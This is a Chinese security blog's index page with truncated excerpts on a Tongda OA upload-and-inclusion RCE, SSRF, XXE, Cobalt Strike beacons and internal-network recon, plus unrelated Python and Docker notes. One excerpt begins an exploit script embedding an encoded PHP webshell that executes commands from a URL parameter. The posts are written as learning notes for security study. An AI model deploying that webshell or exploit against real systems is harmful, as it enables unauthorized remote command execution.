Zeo's Blog

通达OA任意文件上传/文件包含RCE漏洞分析 0x01 前提 0x01 漏洞介绍 0x02 漏洞分析 首先下载安装 绕过身份验证文件上传部分 变量传递问题 文件包含部分 0x01 前提关于这个漏洞的利用方式： ​ 利用方式大致有两种： 包含日志文件。 绕过身份验证文件上传然后在文件包含。 下面主要分析第二种 0x01 漏洞介绍_通达OA_系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户,超过… 主要危害： 攻击者可以在为登陆或者说，无任何条件触发漏洞，上传图片木马文件，请求进行文件包含最终可达成远程命令执行 影响版本： V11版 2017版 2016版 2015版 2013版 2013增强版 0x02 漏洞分析我用的官网下载的V11.3 利用方式大致有两种： 包含日志文件。 绕过身份验证文件上传然后在文件包含。 下面我主要分析饶过权限上传，然后文件包含的方式： 首先下载安装打开源码一看，都加密了，使用zend进行了加密。 所以先要进行解密，百度 ...

0x00 SSRF简介和原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如，通过控制前台的请求远程地址加载的响应，来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务，来造成对内网系统的攻击。 0x01 漏洞危害 扫描内网开放服务 向内部任意主机的任意端口发送payload来攻击内网服务 攻击内网的web应用，例如直接SQL注入、XSS攻击等 利用file、gopher、dict协议读取本地文件、执行命令等 0x02 漏洞常出现的地方1.社交分享功能：获取超链接的标题等内容进行显示 2.转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览 3.在线翻译：给网址翻译对应网页的内容 4.图片加载/下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片 5.图片/文章收藏功能：主要其会取URL地址中titl ...

RCE思路如下：未授权上传文件（jpg）->php代码包含->rce理论上是通杀，但是貌似2015版没有包含功能大家可以复现了 123456789101112131415161718192021222324252627282930313233343536import osimport requests# 定义webshell，因为是包含，所以用写入马比较方便# 这个马自带bypass disable_function 功能shell = '''<?php$fp = fopen('poc.php', 'w+');$a = base64_decode("JTNDJTNGcGhwJTBBJTI0Y29tbWFuZCUzRCUyNF9HRVQlNWIlMjdhJTI3JTVkJTNCJTBBJTI0d3NoJTIwJTNEJTIwbmV3JTIwQ09NJTI4JTI3V1NjcmlwdC5zaGVsbCUyNyUyOSUzQiUwQSUyNGV4ZWMlMjAlM0QlMjAlMjR3c2 ...

内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用内网安全学习从入门到入狱-神器-Cobalt Strike-二-Beacon简介和使用 内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用 0x01简单的木马打到一台PC 生成win的 Payload 0x02 beacon的介绍和使用 Beacon简介 Beacon分类： http beacon DNS beacon SMB beacon 进入beacon 简单的命令执行 最常用的修改心跳包 内网安全学习从入门到入狱-工具-Cobalt Strike(cs)基础 上一次Cobalt Strike写到简单的介绍和启动服务和打开 这一次我们写简单的木马生成以便介绍后续的功能 介绍一下beacon的作用和一下常用的操作 0x01简单的木马打到一台PC我们得有一个机子才能做后续的实验吧，所以 这算是获得了一个入口的机器 这才是一台win7来介绍一下beacon 生成win的 Payload1、attacks-packages-Windows ...

内网安全学习从入门到入狱-知识-内网信息收集内网信息收集-工作组和域内基本信息收集 内网安全学习从入门到入狱-知识-内网信息收集 0x01本机检查–先看看我是谁 查询并开启远程连接服务 0x02域内信息收集 查询当前额权限 判断是否有域 查找域控 获取域内的用户信息 0x03 域内网存活主机的探测 主机存活扫描 域内端口扫描 PowerSploit 中的 Invoke-Portscan.ps1 脚本 前提准备 本文中PowerShell脚本可以自行下载 https://github.com/PowerShellMafia/PowerSploit 0x01本机检查–先看看我是谁域内的主机一般都是批量的，所以我们看看我们自己，基本上大家也就是差不多的情况 先看看ip，看看网卡，内外网情况，IP段记录一下，DNS 1ipconfig /all 查看用户列表 1net user 查看在线的用户 1query user || qwinsta 查看本机管理员 1net localgroup administrators 看管理员进程 ...

- Python通过prettytable模块将输出内容如表格输出 比自己那个高端的多了 而且十分简单的使用 1安装得有吧 1pip install PrettyTable 2导入模块 1import prettytable as pt 直接给例子 123456789101112131415import prettytable as pt# 添加表头table = pt.PrettyTable(["URL", "参数", "沙雕"])# add_row 添加一行数据table.add_row(["http://aaa.com", "raskv", "123123"])table.add_row(["http://bbb.com", "susd", "123123"])table.add_row(["http://ccc.com", "pwd", " ...

XXE漏洞1. XXE概述XXE（XML External Entity Injection）即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 可以造成危害 文件读取 ssrf dos 命令执行 XML基础介绍XML是可扩展的标记语言（eXtensible Markup Language），设计用来进行数据的传输和存储。 下面我们主要介绍PHP语言下的XXE攻击. 基本结构例子 1234567891011121314151617181920<!--XML声明--><?xml version="1.0"?> <!--文档类型定义--><!DOCTYPE note [ <!--定义此文档是 note 类型的文档--><!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素--><!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型-- ...

内网安全学习从入门到入狱-工具-Cobalt Strike(CS)基础前言 本文主要是看了 Cobalt Strike 各种资料后记的笔记。 参考过于杂乱，如有问题请联系我 手上虽然没有4.0 ，但是也要提前学习了 Cobalt Strike简介官网收费软件 https://www.cobaltstrike.com/，Cobalt Strike许可费用为每位用户3500美元，其他的不说了 Cobalt Strike是用于“对手模拟”和“红队行动”的软件 C/S架构的商业渗透软件，适合多人进行团队协作，可模拟APT做模拟对抗，进行内网渗透 个人感觉是内网利器，所以放到内网里面了 Cobalt Strike 主要用于团队作战，可谓是团队渗透神器，能让多个攻击者同时连接到团体服务器上，共享攻击资源与目标信息和sessions。 Cobalt Strike 作为一款协同APT工具，针对内网的渗透测试和作为apt的控制终端功能，使其变成众多APT组织的首选。 基本名词解释C2C2 就是 Command & Control Server 的简称，也就是 ...

内网安全学习从入门到入狱-知识-内网基础知识文章目录 内网安全学习从入门到入狱-知识-内网基础知识 内网渗透基础 基本的名词介绍 工作组 域 活动目录（AD） DC 域控制器（DC） DNS域名服务器 安全域的划分 DMZ是什么？ 域中有哪些电脑？ 域内的权限分类 域本地组 全局组 通用组 A-G-DL-P 策略 常用本地域组的权限 内网渗透基础 首先本文章基本上学习笔记 基本的名词介绍工作组 工作组(Work Group)是最常见最简单最普通的资源管理模式，就是将不同的电脑按功能分别列入不同的组中，以方便管理。 工作组简单来说就是计算机在一个局域网中的的一个圈子，这个圈子大家都是平等的，想来就来想走就走，基本上没有什么约束，自我感觉就是一个组织的名称而已没有什么管理功能。 域 域是一个有安全边界的计算机集合,在同一个域中的计算机, _计算机域_彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可。 和工作组比较，相当于加入了管理功能，有一些身份验证的功能，更加智能和安全 活动目录（AD） 活动目录（Active ...

docker基础篇-安装和配置 mac上官方安装介绍docker官网mac安装也可以参考这个安装教程开始第一步下载https://hub.docker.com/editions/community/docker-ce-desktop-mac/Get DockerStableEdge The Stable version is fully baked and tested, and comes with the latest GA release of Docker.The Edge version offers cutting edge features and comes with experimental features turned on. Get Docker Desktop for Mac (Stable)Get Docker Desktop for Mac (Edge) 这有两种Stable 季度版本Edge 月版本完成下载docker.dmg第二部安装双击正常安装  第三部打开docker双击图标，成功打开 第四部登陆登录dockerId ，开始安装数据如果 ...